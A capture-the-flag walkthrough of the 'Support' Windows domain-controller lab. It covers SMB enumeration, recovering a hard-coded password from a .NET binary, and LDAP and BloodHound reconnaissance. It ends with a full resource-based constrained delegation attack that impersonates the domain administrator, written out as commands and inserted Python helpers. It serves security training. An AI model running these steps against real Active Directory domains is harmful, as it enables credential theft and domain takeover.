PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-09-26 14:12:20Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Initial nmap results. DNS, Kerberos, LDAP (with the support.htb domain in the banner) and SMB on one host means we've got a domain controller.
We get nothing we don't already know from the DNS server, and it isn't vulnerable to anything I know of, so on to enumerating SMB.
smbmap -H 10.129.38.195 -u anonymous
[+] Guest session       IP: 10.129.38.195:445   Name: support.htb
        Disk                Permissions     Comment
        ----                -----------     -------
        ADMIN$              NO ACCESS       Remote Admin
        C$                  NO ACCESS       Default share
        IPC$                READ ONLY       Remote IPC
        NETLOGON            NO ACCESS       Logon server share
        support-tools       READ ONLY       support staff tools
        SYSVOL              NO ACCESS       Logon server share
smb: \> ls
  .                                   D        0  Wed Jul 20 18:01:06 2022
  ..                                  D        0  Sat May 28 12:18:25 2022
  7-ZipPortable_21.07.paf.exe         A  2880728  Sat May 28 12:19:19 2022
  npp.8.4.1.portable.x64.zip          A  5439245  Sat May 28 12:19:55 2022
  putty.exe                           A  1273576  Sat May 28 12:20:06 2022
  SysinternalsSuite.zip               A 48102161  Sat May 28 12:19:31 2022
  UserInfo.exe.zip                    A   277499  Wed Jul 20 18:01:07 2022
  windirstat1_1_2_setup.exe           A    79171  Sat May 28 12:20:17 2022
  WiresharkPortable64_3.6.5.paf.exe   A 44398000  Sat May 28 12:19:43 2022
At this stage the only share we can read as the anonymous user is support-tools, which contains a handy bunch of files. We also have read access to IPC$, which means anonymous RPC works and we can try impacket's lookupsid.py to cycle RIDs and enumerate domain usernames (it gives names, not credentials); any usernames we recover can then be fed to GetNPUsers.py to check for accounts without Kerberos pre-authentication.

None of these return AS-REP hashes (no account has pre-authentication disabled), so I'll have a look at the SMB share. The only file that stands out is UserInfo.exe.zip. I'm not sure what it is, so I'll analyse it.
I analyse it in dnSpy, as it's a .NET assembly, and find the password handling: the exe decrypts a hard-coded string at runtime and uses the result to authenticate to the server.

While continuing to poke around I realise the binary authenticates to support.htb, which my machine resolves through /etc/hosts. As a test I point support.htb at my Kali VM in /etc/hosts and open up Responder…

That lets us grab the Net-NTLMv2 challenge-response the binary sends when it authenticates to our listener. Not as useful as having the password, so back to dnSpy, setting a break point in the debugger at the point where the software calls for the decrypted password.

Here we can see the decrypted password for the user ldap. That account has a bit more access to SMB than anonymous, but we get errors trying to connect to the shares with it.
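As an added example (editor's code, not from the write-up), the decryption routine the binary runs can be reproduced in Python so the password is recovered without a debugger break point. The base64 blob, the XOR key "armando" and the 0xDF constant are the values held in the binary's Protected class as seen in dnSpy; they are not shown on this page, so treat them as the editor's reading of the assembly.

```python
"""
Editor's added example: reproduce UserInfo.exe's string decryption in Python.
The binary base64-decodes a hard-coded blob and XORs every byte with the
repeating key "armando" and then with 0xDF before using it as the ldap
user's password.  ENC_PASSWORD and KEY are the constants from the
assembly's Protected class (recovered in dnSpy, not shown on the page).
"""
import base64

ENC_PASSWORD = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"
KEY = b"armando"
MAGIC = 0xDF


def decrypt(enc_b64: str, key: bytes = KEY) -> str:
    """Undo base64 -> (byte ^ key[i % len(key)] ^ 0xDF), exactly as the .NET code does."""
    data = base64.b64decode(enc_b64)
    plain = bytes(b ^ key[i % len(key)] ^ MAGIC for i, b in enumerate(data))
    # The binary uses Encoding.Default; the result here is plain ASCII, so latin-1 is lossless.
    return plain.decode("latin-1")


def encrypt(plaintext: str, key: bytes = KEY) -> str:
    """Inverse direction.  XOR is symmetric, so the same transform re-encodes;
    round-tripping is a quick check that the routine was read correctly."""
    raw = plaintext.encode("latin-1")
    data = bytes(c ^ key[i % len(key)] ^ MAGIC for i, c in enumerate(raw))
    return base64.b64encode(data).decode("ascii")


if __name__ == "__main__":
    print(decrypt(ENC_PASSWORD))
```

Running the script prints the same password the debugger break point exposes, and encrypt(decrypt(ENC_PASSWORD)) returns the original blob, which confirms the key order and the 0xDF step were read correctly from the decompiled code.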

Since we’re the LDAP user, let’s enumerate LDAP.
ldapsearch -x -H ldap://support.htb -D 'support\ldap' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b "CN=Users,DC=support,DC=htb" > ldapsearch
Dumping all the data to a text file makes it less painful to read; eventually we come across the support user, whose info attribute holds an interesting note.
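Rather than scrolling the dump, the free-text attributes where admins tend to leave notes can be pulled out by a script. The following is an added example (editor's code, not from the write-up) that reads ldapsearch's LDIF output and reports every entry with info, description or comment set. It handles the two LDIF quirks that defeat a plain grep: long values are folded onto continuation lines that begin with a single space, and binary or non-ASCII values are base64-encoded behind a double colon. SAMPLE_LDIF is constructed for the example; it is not the real dump and the note text is a placeholder.

```python
"""
Editor's added example: find free-text attributes (info, description, comment)
in an ldapsearch LDIF dump.  SAMPLE_LDIF is a constructed stand-in for the
real output; the support user's note below is a placeholder, not the real one.
"""
import base64
import re

NOTE_ATTRS = ("info", "description", "comment")
# attribute name, ':' or '::' (base64), optional space, value
ATTR_LINE = re.compile(r"^([A-Za-z][A-Za-z0-9;.-]*)(::?) ?(.*)$")

SAMPLE_LDIF = """\
# constructed sample, not the real ldapsearch output
dn: CN=support,CN=Users,DC=support,DC=htb
objectClass: user
sAMAccountName: support
description:: SGVscGRlc2s=
info: CONSTRUCTED-NOTE-placeholder
 -continued-on-a-folded-line

dn: CN=ldap,CN=Users,DC=support,DC=htb
objectClass: user
sAMAccountName: ldap

dn: CN=Guest,CN=Users,DC=support,DC=htb
objectClass: user
sAMAccountName: Guest
description: Built-in account for guest access to the computer/domain
"""


def unfold(text: str) -> list:
    """Join LDIF continuation lines (a leading single space) onto the previous line."""
    lines = []
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    return lines


def parse_ldif(text: str) -> list:
    """Return one {attribute: [values]} dict per entry; entries are separated by blank lines."""
    entries, current = [], {}
    for line in unfold(text):
        if not line.strip():
            if current:
                entries.append(current)
                current = {}
            continue
        if line.startswith("#"):  # ldapsearch's '# extended LDIF' style comments
            continue
        m = ATTR_LINE.match(line)
        if not m:
            continue
        attr, sep, value = m.groups()
        if sep == "::":  # base64-encoded value (binary, leading space, non-ASCII, ...)
            value = base64.b64decode(value).decode("utf-8", errors="replace")
        current.setdefault(attr, []).append(value)
    if current:
        entries.append(current)
    return entries


def find_notes(entries: list, attrs=NOTE_ATTRS) -> dict:
    """sAMAccountName -> {attr: value} for every entry that has a free-text attribute set."""
    notes = {}
    for entry in entries:
        name = entry.get("sAMAccountName", [None])[0]
        found = {a: " ".join(entry[a]) for a in attrs if a in entry}
        if name and found:
            notes[name] = found
    return notes


if __name__ == "__main__":
    for user, fields in find_notes(parse_ldif(SAMPLE_LDIF)).items():
        for attr, value in fields.items():
            print("%s\t%s: %s" % (user, attr, value))
```

Against the real dump you would feed the file saved by the ldapsearch command above into parse_ldif; the support user's note shows up as its info value, and built-in descriptions (like Guest's) come along too, so a quick eyeball of the output is still needed.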

This looks like a password, and with it we can get a shell on the box as support with evil-winrm.

First thing I'll do is run SharpHound and load the results into BloodHound to enumerate the domain.

Get-DomainObject -Identity "dc=support,dc=htb" -Domain support.htb
...
ms-ds-machineaccountquota : 10

Get-NetComputer dc | Select-Object -Property name, msds-allowedtoactonbehalfofotheridentity

name msds-allowedtoactonbehalfofotheridentity
---- ----------------------------------------
DC
BloodHound shows we have write access over the DC computer object; ms-DS-MachineAccountQuota is still the default of 10, so any authenticated user can create up to ten machine accounts; and msDS-AllowedToActOnBehalfOfOtherIdentity on DC is empty, so nothing is configured there yet and we can set it ourselves. That's everything needed for resource-based constrained delegation.
Using Powermad.ps1 we'll add a new machine account.
New-MachineAccount -MachineAccount CACK01 -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose
Verbose: [+] Domain Controller = dc.support.htb
Verbose: [+] Domain = support.htb
Verbose: [+] SAMAccountName = CACK01$
Verbose: [+] Distinguished Name = CN=CACK01,CN=Computers,DC=support,DC=htb
[+] Machine account CACK01 added

Now we grab the new account's SID and build a raw security descriptor whose single ACE grants that SID full control. This is the value that gets written into the DC's msDS-AllowedToActOnBehalfOfOtherIdentity attribute, which is what tells the DC to trust CACK01$ for delegation.
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1677581083-3380853377-188903654-5601)"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
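To show what those three PowerShell lines actually produce, here is an added example (editor's code, not from the write-up) that builds a self-relative security descriptor from the same SDDL string in Python and parses it back. The encoding follows MS-DTYP; the section order (owner, then DACL) is one valid layout and parsers, AD included, locate sections by offset, so it need not be byte-identical to .NET's output. Only the SDDL subset on the page is handled: an owner plus a DACL of plain ACCESS_ALLOWED ACEs with generic or standard rights.

```python
"""
Editor's added example: encode the page's SDDL into the binary
SECURITY_DESCRIPTOR_RELATIVE that ends up in msDS-AllowedToActOnBehalfOfOtherIdentity,
and decode such a blob back.  Handles 'O:<owner>D:(A;;rights;;;SID)...' only:
no object ACEs, no ACE flags, no SACL or group.
"""
import re
import struct

# Two-letter SDDL rights (MS-DTYP 2.5.1.2) -> ACCESS_MASK bits.
SDDL_RIGHTS = {
    "CC": 0x00000001, "DC": 0x00000002, "LC": 0x00000004, "SW": 0x00000008,
    "RP": 0x00000010, "WP": 0x00000020, "DT": 0x00000040, "LO": 0x00000080,
    "CR": 0x00000100,                                    # directory object rights
    "SD": 0x00010000, "RC": 0x00020000, "WD": 0x00040000, "WO": 0x00080000,  # standard
    "GA": 0x10000000, "GX": 0x20000000, "GW": 0x40000000, "GR": 0x80000000,  # generic
}
SDDL_SID_ALIASES = {"BA": "S-1-5-32-544"}  # BUILTIN\Administrators, the owner used on the page
SE_DACL_PRESENT, SE_SELF_RELATIVE, ACCESS_ALLOWED_ACE_TYPE = 0x0004, 0x8000, 0x00

# The SDDL string from the PowerShell snippet above.
PAGE_SDDL = "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1677581083-3380853377-188903654-5601)"


def rights_to_mask(rights: str) -> int:
    """'CCDCLC...' -> ACCESS_MASK; SDDL also allows a hex literal such as 0xF01FF."""
    if rights.lower().startswith("0x"):
        return int(rights, 16)
    mask = 0
    for i in range(0, len(rights), 2):
        mask |= SDDL_RIGHTS[rights[i:i + 2]]
    return mask


def sid_to_bytes(sid: str) -> bytes:
    """'S-1-5-21-...' -> binary SID: Revision(1) SubAuthCount(1) Authority(6, BE) SubAuths(4 each, LE)."""
    parts = SDDL_SID_ALIASES.get(sid, sid).split("-")
    if parts[0] != "S" or parts[1] != "1":
        raise ValueError("unsupported SID %r" % sid)
    authority, subs = int(parts[2]), [int(p) for p in parts[3:]]
    return bytes([1, len(subs)]) + authority.to_bytes(6, "big") + struct.pack("<%dI" % len(subs), *subs)


def bytes_to_sid(buf: bytes, off: int) -> str:
    rev, count = buf[off], buf[off + 1]
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "S-%d-%d-%s" % (rev, authority, "-".join(str(s) for s in subs))


def ace_to_bytes(ace: str) -> bytes:
    """'A;;rights;;;SID' -> ACCESS_ALLOWED_ACE: AceType(1) AceFlags(1) AceSize(2) Mask(4) SID."""
    ace_type, flags, rights, obj_guid, inh_guid, sid = ace.split(";")
    if ace_type != "A" or flags or obj_guid or inh_guid:
        raise ValueError("only plain ACCESS_ALLOWED ACEs are handled here: %r" % ace)
    body = struct.pack("<I", rights_to_mask(rights)) + sid_to_bytes(sid)
    return struct.pack("<BBH", ACCESS_ALLOWED_ACE_TYPE, 0, 4 + len(body)) + body


def sddl_to_security_descriptor(sddl: str) -> bytes:
    m = re.fullmatch(r"O:([A-Z]{2}|S-[0-9-]+)D:((?:\([^)]*\))+)", sddl)
    if not m:
        raise ValueError("expected 'O:<owner>D:(ace)...': %r" % sddl)
    owner = sid_to_bytes(m.group(1))
    aces = [ace_to_bytes(a) for a in re.findall(r"\(([^)]*)\)", m.group(2))]
    ace_bytes = b"".join(aces)
    # ACL header: AclRevision(1)=2 (ACL_REVISION, no object ACEs) Sbz1(1) AclSize(2) AceCount(2) Sbz2(2)
    dacl = struct.pack("<BBHHH", 2, 0, 8 + len(ace_bytes), len(aces), 0) + ace_bytes
    # SD header (20 bytes): Revision Sbz1 Control OffsetOwner OffsetGroup OffsetSacl OffsetDacl
    header = struct.pack("<BBHIIII", 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE, 20, 0, 0, 20 + len(owner))
    return header + owner + dacl


def describe(sd: bytes) -> dict:
    """Parse a self-relative SD into {control, owner, aces: [(mask, sid), ...]}."""
    _, _, control, off_owner, _, _, off_dacl = struct.unpack_from("<BBHIIII", sd, 0)
    info = {"control": control, "owner": bytes_to_sid(sd, off_owner) if off_owner else None, "aces": []}
    if control & SE_DACL_PRESENT and off_dacl:
        ace_count = struct.unpack_from("<BBHHH", sd, off_dacl)[3]
        pos = off_dacl + 8
        for _ in range(ace_count):
            ace_size = struct.unpack_from("<BBH", sd, pos)[2]
            mask = struct.unpack_from("<I", sd, pos + 4)[0]
            info["aces"].append((mask, bytes_to_sid(sd, pos + 8)))
            pos += ace_size
    return info


if __name__ == "__main__":
    sd = sddl_to_security_descriptor(PAGE_SDDL)
    print(len(sd), "bytes:", sd.hex())
    print(describe(sd))
```

The rights string CCDCLCSWRPWPDTLOCRSDRCWDWO collapses to the mask 0xF01FF, i.e. every directory-object right plus the four standard rights, which is why a single ACE is enough for the delegation entry. describe() is also handy in the other direction: decode an existing msDS-AllowedToActOnBehalfOfOtherIdentity value to see which SIDs are already trusted before overwriting it.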
Now to derive the Kerberos keys for our password (123456) with Rubeus hash; getST.py's -aesKey option wants the AES key rather than the NT hash.

Now we can use that key to request a ticket: getST.py authenticates as CACK01, performs S4U2Self to obtain a ticket for administrator, then S4U2Proxy to get a service ticket for the DC's http SPN, and saves it to a ccache.
python3 /opt/impacket/examples/getST.py support.htb/CACK01 -dc-ip dc.support.htb -impersonate administrator -spn http/dc.support.htb -aesKey
export KRB5CCNAME=administrator.ccache

Support was a great box, I really enjoyed enumerating the services. I’m starting to understand Reverse Engineering more and always welcome an opportunity to graph a domain with BloodHound!